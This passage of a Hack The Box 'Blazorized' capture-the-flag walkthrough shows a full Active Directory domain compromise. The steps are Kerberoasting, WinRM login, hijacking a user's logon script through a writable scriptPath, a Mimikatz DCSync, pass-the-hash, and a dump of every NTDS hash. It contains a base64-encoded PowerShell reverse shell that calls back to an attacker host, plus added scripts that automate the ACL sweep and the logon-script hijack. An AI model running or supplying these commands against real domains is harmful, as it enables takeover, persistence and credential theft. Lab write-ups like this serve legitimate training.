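        Set-DomainObject -Identity $Target -Set @{ serviceprincipalname = $originalSpns }
    } else {
        Set-DomainObject -Identity $Target -Clear serviceprincipalname
    }
}
```

The hash prefix tells you the Hashcat mode: $krb5tgs$23$ is RC4 (mode 13100) as seen here, while an account restricted to AES via msDS-SupportedEncryptionTypes yields $krb5tgs$17$ or $krb5tgs$18$ tickets (modes 19600 and 19700), which crack considerably slower.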
It cracks to the password (Ni7856Do9854Ki05Ng0005 #). The compromised user rsa_4810 is also a member of the REMOTE MANAGEMENT USERS group, so we can authenticate via WinRM (5985/TCP, seen in the Nmap scan) to the DC1 host.
We use Evil-WinRM to establish the connection.
$ evil-winrm -i dc1.blazorized.htb -u rsa_4810 -p '(Ni7856Do9854Ki05Ng0005 #)'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\RSA_4810\Documents> whoami
blazorized\rsa_4810
*Evil-WinRM* PS C:\Users\RSA_4810\Documents> hostname
DC1
Writing Logon Script & Lateral Movement to ssa_6010¶
With code execution as domain user rsa_4810, we go back to our BloodHound data and find that the compromised user is also a member of a non-standard group called REMOTE_SUPPORT_ADMINISTRATORS.
The imported BloodHound data shows no useful outbound edge for it, but a custom group like this hints at some other configuration in the Active Directory environment we may be able to abuse.
We use PowerView with the compromised user to list every ACE in the domain that grants rights to rsa_4810 directly. Note that this filter matches the user's own SID only; rights granted to one of the user's groups would not show up, so the group SIDs should be included as well when doing this for real.
*Evil-WinRM* PS C:\ProgramData\xpltive> Import-Module .\PowerView.ps1
*Evil-WinRM* PS C:\ProgramData\xpltive> $rsa_4810_sid = Convert-NameToSid rsa_4810
*Evil-WinRM* PS C:\ProgramData\xpltive> Get-DomainObjectAcl -Identity * -ResolveGUIDs | ? {$_.SecurityIdentifier -eq $rsa_4810_sid}
AceType : AccessAllowed
ObjectDN : CN=NU_1055,CN=Users,DC=blazorized,DC=htb
ActiveDirectoryRights : ReadProperty, GenericExecute
OpaqueLength : 0
ObjectSID : S-1-5-21-2039403211-964143010-2924010611-1117
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-2039403211-964143010-2924010611-1107
AccessMask : 131092
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
AceQualifier : AccessAllowed
ObjectDN : CN=SSA_6010,CN=Users,DC=blazorized,DC=htb
ActiveDirectoryRights : WriteProperty
ObjectAceType : Script-Path
ObjectSID : S-1-5-21-2039403211-964143010-2924010611-1124
InheritanceFlags : None
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-2039403211-964143010-2924010611-1107
AccessMask : 32
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
AceType : AccessAllowed
ObjectDN : CN=SSA_6010,CN=Users,DC=blazorized,DC=htb
ActiveDirectoryRights : ReadProperty, GenericExecute
OpaqueLength : 0
ObjectSID : S-1-5-21-2039403211-964143010-2924010611-1124
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-2039403211-964143010-2924010611-1107
AccessMask : 131092
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
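The sweep above matched only rsa_4810's own SID and returned every ACE, including the read-only ones every user has. The following is an added example (not from the write-up), assumed to run from the same Evil-WinRM session with PowerView.ps1 in the working directory, that also matches ACEs granted to any group the user belongs to (resolved through the nested-membership matching rule PowerView uses for -MemberIdentity) and keeps only rights that give control over another object.

```powershell
# Added example: domain ACL sweep for a user and all of its groups, abusable rights only.
Import-Module .\PowerView.ps1

$principal = 'rsa_4810'
$userSid   = ConvertTo-SID $principal              # Convert-NameToSid is an alias of this

# SIDs of every group the user is a member of, directly or nested.
$groupSids = Get-DomainGroup -MemberIdentity $principal -Properties objectsid |
             Select-Object -ExpandProperty objectsid
$sids = @($userSid) + @($groupSids)

# ActiveDirectoryRights values that translate into control over the target.
$interesting = 'GenericAll|GenericWrite|WriteProperty|WriteDacl|WriteOwner|Self|ExtendedRight'

Get-DomainObjectAcl -Identity * -ResolveGUIDs |
    Where-Object { $sids -contains $_.SecurityIdentifier.Value } |
    Where-Object { $_.ActiveDirectoryRights -match $interesting } |
    ForEach-Object {
        [pscustomobject]@{
            Principal = ConvertFrom-SID $_.SecurityIdentifier.Value
            Target    = $_.ObjectDN
            Rights    = $_.ActiveDirectoryRights
            Attribute = $_.ObjectAceType        # e.g. Script-Path; empty for non-object ACEs
            Inherited = $_.IsInherited
        }
    } | Sort-Object Target | Format-Table -AutoSize
```

On this box the output reduces to the single WriteProperty ACE on Script-Path of SSA_6010, with rsa_4810 as the principal. Had the right been granted to REMOTE_SUPPORT_ADMINISTRATORS instead of the user, the original SID-only filter would have missed it while this one still reports it with the group's name in the Principal column.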
We have WriteProperty on the Script-Path attribute (scriptPath) of domain user SSA_6010. With this we can point the user's logon script at a file of our choosing, which then runs in that user's context the next time they log on interactively.
The scriptPath value is resolved relative to the NETLOGON share of the authenticating domain controller (\\DOMAIN\NETLOGON, which is the same location as \\DOMAIN\SYSVOL\DOMAIN\scripts). We therefore need to be able to write to that folder as rsa_4810 or another user we have compromised. We run a quick check of the access rights with icacls.
*Evil-WinRM* PS C:\ProgramData\xpltive> icacls \\blazorized.htb\sysvol\blazorized.htb\scripts\
\\blazorized.htb\sysvol\blazorized.htb\scripts\ CREATOR OWNER:(OI)(CI)(IO)(F)
NT AUTHORITY\Authenticated Users:(OI)(CI)(RX)
NT AUTHORITY\SYSTEM:(OI)(CI)(F)
BLAZORIZED\RSA_4810:(RX)
BLAZORIZED\Administrator:(RX)
BUILTIN\Administrators:(RX,W,WDAC,WO)
BUILTIN\Administrators:(OI)(CI)(IO)(F)
BUILTIN\Server Operators:(OI)(CI)(RX)
Successfully processed 1 files; Failed processing 0 files
*Evil-WinRM* PS C:\ProgramData\xpltive> icacls \\blazorized.htb\sysvol\blazorized.htb\scripts\*
\\blazorized.htb\sysvol\blazorized.htb\scripts\11DBDAEB100D BUILTIN\Administrators:(I)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(RX)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Server Operators:(I)(OI)(CI)(RX)
\\blazorized.htb\sysvol\blazorized.htb\scripts\A2BFDCF13BB2 BUILTIN\Administrators:(I)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(RX)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Server Operators:(I)(OI)(CI)(RX)
\\blazorized.htb\sysvol\blazorized.htb\scripts\A32FF3AEAA23 BLAZORIZED\RSA_4810:(OI)(CI)(F)
BLAZORIZED\Administrator:(OI)(CI)(F)
BUILTIN\Administrators:(I)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(RX)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Server Operators:(I)(OI)(CI)(RX)
\\blazorized.htb\sysvol\blazorized.htb\scripts\CADFDDCE0BAD BUILTIN\Administrators:(I)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(RX)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Server Operators:(I)(OI)(CI)(RX)
\\blazorized.htb\sysvol\blazorized.htb\scripts\CAFE30DAABCB BUILTIN\Administrators:(I)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(RX)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Server Operators:(I)(OI)(CI)(RX)
Successfully processed 5 files; Failed processing 0 files
We have full access to the A32FF3AEAA23 folder. The plan is to create a malicious .bat file that runs a PowerShell reverse shell, place it in that directory and set the scriptPath of ssa_6010 to it, so the script runs and connects back to our attack host when that user next logs on.
We start by creating the .bat file. We once again use a base64-encoded PowerShell command from revshells and save it as a .bat file.
$ echo 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AMwAzACIALAA2ADYANgA2ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==' > shelly.bat
We upload it to the victim host using Evil-WinRM's upload function and copy it to the target path \\blazorized.htb\sysvol\blazorized.htb\scripts\A32FF3AEAA23 that we have full access to.
*Evil-WinRM* PS C:\Programdata\xpltive> upload ./tools/shelly.bat
Info: Uploading /home/kali/htb/blazorized/tools/shelly.bat to C:\Programdata\xpltive\shelly.bat
Data: 1848 bytes of 1848 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Programdata\xpltive> cp shelly.bat \\blazorized.htb\sysvol\blazorized.htb\scripts\A32FF3AEAA23\shelly.bat
Finally we start our listener, set the scriptPath of ssa_6010 with PowerView's Set-DomainObject and confirm the change with Get-DomainObject. The value is relative to NETLOGON, so no UNC prefix is needed.
*Evil-WinRM* PS C:\Programdata\xpltive> Set-DomainObject SSA_6010 -Set @{'scriptPath'='A32FF3AEAA23\shelly.bat'} -Verbose
*Evil-WinRM* PS C:\Programdata\xpltive> Get-DomainObject -Identity SSA_6010
logoncount : 3410
badpasswordtime : 6/19/2024 9:58:18 AM
distinguishedname : CN=SSA_6010,CN=Users,DC=blazorized,DC=htb
objectclass : {top, person, organizationalPerson, user}
displayname : SSA_6010
lastlogontimestamp : 1/17/2025 3:16:08 PM
userprincipalname : SSA_6010@blazorized.htb
name : SSA_6010
objectsid : S-1-5-21-2039403211-964143010-2924010611-1124
samaccountname : SSA_6010
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 1/18/2025 2:03:12 AM
instancetype : 4
usncreated : 29007
objectguid : 8bf3166b-e716-4f91-946c-174e1fb433ed
lastlogoff : 12/31/1600 6:00:00 PM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=blazorized,DC=htb
dscorepropagationdata : {6/19/2024 1:24:50 PM, 6/14/2024 12:40:41 PM, 6/14/2024 12:40:28 PM, 6/14/2024 12:38:20 PM...}
memberof : {CN=Super_Support_Administrators,CN=Users,DC=blazorized,DC=htb, CN=Remote Management Users,CN=Builtin,DC=blazorized,DC=htb}
lastlogon : 1/17/2025 8:03:10 PM
cn : SSA_6010
badpwdcount : 0
scriptpath : A32FF3AEAA23\shelly.bat
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated : 1/10/2024 2:32:00 PM
primarygroupid : 513
pwdlastset : 2/25/2024 11:56:55 AM
usnchanged : 357071
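The steps above, combined into one script as an added example (not from the write-up): it proves write access to the NETLOGON subfolder before touching the user object, records the current scriptPath, plants the file, sets and verifies the attribute, and with -Cleanup puts everything back. It assumes PowerView.ps1 and shelly.bat (the encoded reverse shell created earlier) sit in the current directory; the folder name is the one from the icacls output.

```powershell
# Added example: logon-script hijack via WriteProperty on scriptPath, with verification and cleanup.
param(
    [string]$Target    = 'SSA_6010',
    [string]$Folder    = 'A32FF3AEAA23',
    [string]$ScriptSrc = '.\shelly.bat',
    [switch]$Cleanup
)
Import-Module .\PowerView.ps1

$domain    = (Get-Domain).Name
$netlogon  = "\\$domain\NETLOGON\$Folder"           # same folder as \\$domain\SYSVOL\$domain\scripts\$Folder
$leaf      = Split-Path -Leaf $ScriptSrc
$dest      = Join-Path $netlogon $leaf
$relative  = "$Folder\$leaf"                        # scriptPath is relative to NETLOGON
$stateFile = ".\$Target.scriptpath.orig"

if ($Cleanup) {
    $orig = "$(if (Test-Path $stateFile) { Get-Content $stateFile -Raw })".Trim()
    if ($orig) { Set-DomainObject -Identity $Target -Set @{ scriptPath = $orig } }
    else       { Set-DomainObject -Identity $Target -Clear scriptPath }
    Remove-Item -Path $dest -ErrorAction SilentlyContinue
    Write-Host "[+] restored scriptPath of $Target and removed $dest"
    return
}

# 1. Prove we can write to the folder before modifying the user object.
$probe = Join-Path $netlogon ".probe-$PID"
try { Set-Content -Path $probe -Value 'x' -ErrorAction Stop; Remove-Item $probe }
catch { throw "no write access to $netlogon as $env:USERNAME" }

# 2. Save the current scriptPath (may be empty) so it can be restored later.
$current = (Get-DomainUser -Identity $Target -Properties scriptpath).scriptpath
Set-Content -Path $stateFile -Value "$current"

# 3. Plant the script and point the user at it.
Copy-Item -Path $ScriptSrc -Destination $dest -Force
Set-DomainObject -Identity $Target -Set @{ scriptPath = $relative } -Verbose

# 4. Verify what the DC will hand out at the next interactive logon.
$check = (Get-DomainUser -Identity $Target -Properties scriptpath).scriptpath
if ($check -ne $relative) { throw "scriptPath did not take: '$check'" }
Write-Host "[+] $Target will run $relative from NETLOGON at next logon; start the listener now"
```

Run it once to plant, and again with -Cleanup after the shell has come back: a logon script pointing at a reverse shell in SYSVOL is exactly the kind of artefact a blue team finds weeks later, and SYSVOL replicates it to every DC in the domain.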
Once ssa_6010 next logs on, the script runs and we catch the shell on our listener as ssa_6010 on the DC1 host.
$ rlwrap -cAr nc -lvnp 6666
listening on [any] 6666 ...
connect to [10.10.16.33] from (UNKNOWN) [10.129.231.74] 52427
PS C:\Windows\system32> whoami
blazorized\ssa_6010
PS C:\Windows\system32> hostname
DC1
Domain Compromise¶
From our BloodHound data we see that the SUPER_SUPPORT_ADMINISTRATORS group, of which the now compromised user ssa_6010 is a member, has DCSync rights (the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights) on the blazorized.htb domain.
We leverage this to obtain the NTLM hash of the domain administrator with Mimikatz: we transfer the tool over and run a DCSync against the Administrator account.
PS C:\ProgramData\xpltive> .\mimikatz.exe "lsadump::dcsync /user:Administrator /domain:blazorized.htb" exit
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # lsadump::dcsync /user:Administrator /domain:blazorized.htb
[DC] 'blazorized.htb' will be the domain
[DC] 'DC1.blazorized.htb' will be the DC server
[DC] 'Administrator' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 2/25/2024 11:54:43 AM
Object Security ID : S-1-5-21-2039403211-964143010-2924010611-500
Object Relative ID : 500
Credentials:
Hash NTLM: f55ed1465179ba374ec1cad05b34a5f3
<--SNIP-->
With the hash we perform a pass-the-hash attack using NetExec, first to confirm it works and then to dump the NTDS domain database. NetExec warns that a full dump can crash a Server 2019 DC; since the administrator hash is already in hand, --user Administrator or the ntdsutil module would be the safer choice outside a lab.
$ nxc smb dc1.blazorized.htb -u Administrator -H f55ed1465179ba374ec1cad05b34a5f3
SMB 10.129.231.74 445 DC1 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC1) (domain:blazorized.htb) (signing:True) (SMBv1:False)
SMB 10.129.231.74 445 DC1 [+] blazorized.htb\Administrator:f55ed1465179ba374ec1cad05b34a5f3 (Pwn3d!)
$ nxc smb dc1.blazorized.htb -u Administrator -H f55ed1465179ba374ec1cad05b34a5f3 --ntds
[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option --user <user> to dump a specific user safely or the module -M ntdsutil [Y/n]
SMB 10.129.231.74 445 DC1 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC1) (domain:blazorized.htb) (signing:True) (SMBv1:False)
SMB 10.129.231.74 445 DC1 [+] blazorized.htb\Administrator:f55ed1465179ba374ec1cad05b34a5f3 (Pwn3d!)
SMB 10.129.231.74 445 DC1 [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.129.231.74 445 DC1 Administrator:500:aad3b435b51404eeaad3b435b51404ee:f55ed1465179ba374ec1cad05b34a5f3:::
SMB 10.129.231.74 445 DC1 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.129.231.74 445 DC1 krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a001ebf25825cadb6b423a2d28378467:::
SMB 10.129.231.74 445 DC1 blazorized.htb\RSA_4810:1107:aad3b435b51404eeaad3b435b51404ee:381b793bde4dea233ae34bb1d9ce38f5:::
SMB 10.129.231.74 445 DC1 blazorized.htb\NU_1056:1109:aad3b435b51404eeaad3b435b51404ee:abe496a00e60878932c084c9db511f94:::
SMB 10.129.231.74 445 DC1 blazorized.htb\NU_1057:1110:aad3b435b51404eeaad3b435b51404ee:59e98e58c973a5cb2b125a17ff91b6a8:::
SMB 10.129.231.74 445 DC1 blazorized.htb\NU_1058:1111:aad3b435b51404eeaad3b435b51404ee:6ac2dfc65463962ed19b653b409046ba:::
SMB 10.129.231.74 445 DC1 blazorized.htb\NU_1055:1117:aad3b435b51404eeaad3b435b51404ee:63001e8b2d13ee358ad7d6de4590fed3:::
SMB 10.129.231.74 445 DC1 blazorized.htb\RSA_4811:1118:aad3b435b51404eeaad3b435b51404ee:4368391035803bf58273e1273692285b:::
SMB 10.129.231.74 445 DC1 blazorized.htb\RSA_4812:1120:aad3b435b51404eeaad3b435b51404ee:c66e4531c81de604e3531018fdad81cb:::
SMB 10.129.231.74 445 DC1 blazorized.htb\RSA_4813:1121:aad3b435b51404eeaad3b435b51404ee:2c84dfeb21e075dc5fc2c56447bdf9d6:::
SMB 10.129.231.74 445 DC1 blazorized.htb\RSA_4814:1122:aad3b435b51404eeaad3b435b51404ee:e7ddd56fabdb8fb1ebe6c43ff5fe815a:::
SMB 10.129.231.74 445 DC1 blazorized.htb\SSA_6010:1124:aad3b435b51404eeaad3b435b51404ee:798d0354e026fd168b91063f09184c9f:::
SMB 10.129.231.74 445 DC1 blazorized.htb\SSA_6011:1125:aad3b435b51404eeaad3b435b51404ee:be1ce1381c084dc4cda8159a665b3c59:::
SMB 10.129.231.74 445 DC1 blazorized.htb\SSA_6012:1126:aad3b435b51404eeaad3b435b51404ee:08db7bd0f2482f4e4cb0b1f6864f88e1:::
SMB 10.129.231.74 445 DC1 blazorized.htb\SSA_6013:1127:aad3b435b51404eeaad3b435b51404ee:ef37b4e655b62e664b6f9ae67133f2e6:::
SMB 10.129.231.74 445 DC1 blazorized.htb\LSA_3211:1128:aad3b435b51404eeaad3b435b51404ee:7c8fed15e80ed63db789ad740cda2f18:::
SMB 10.129.231.74 445 DC1 blazorized.htb\LSA_3212:1129:aad3b435b51404eeaad3b435b51404ee:72bab07816477b4aeffca4f709efbaa5:::
SMB 10.129.231.74 445 DC1 blazorized.htb\LSA_3213:1131:aad3b435b51404eeaad3b435b51404ee:e80b666e0ee68cd0a6516a92e75231cc:::
SMB 10.129.231.74 445 DC1 DC1$:1002:aad3b435b51404eeaad3b435b51404ee:4b4ed5dfaa22dc4e41c279c0c62b9ee2:::
SMB 10.129.231.74 445 DC1 [+] Dumped 20 NTDS hashes to /home/kali/.nxc/logs/DC1_10.129.231.74_2025-01-18_031048.ntds of which 19 were added to the database
SMB 10.129.231.74 445 DC1 [*] To extract only enabled accounts from the output file, run the following command:
SMB 10.129.231.74 445 DC1 [*] cat /home/kali/.nxc/logs/DC1_10.129.231.74_2025-01-18_031048.ntds | grep -iv disabled | cut -d ':' -f1
SMB 10.129.231.74 445 DC1 [*] grep -iv disabled /home/kali/.nxc/logs/DC1_10.129.231.74_2025-01-18_031048.ntds | cut -d ':' -f1
The root flag can now be read from C:\Users\Administrator\Desktop\root.txt.
$ nxc smb dc1.blazorized.htb -u Administrator -H f55ed1465179ba374ec1cad05b34a5f3 -x "type C:\Users\Administrator\Desktop\root.txt"
SMB 10.129.231.74 445 DC1 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC1) (domain:blazorized.htb) (signing:True) (SMBv1:False)
SMB 10.129.231.74 445 DC1 [+] blazorized.htb\Administrator:f55ed1465179ba374ec1cad05b34a5f3 (Pwn3d!)
SMB 10.129.231.74 445 DC1 [+] Executed command via wmiexec
SMB 10.129.231.74 445 DC1 48b522165eef12c73c34205c205de8ac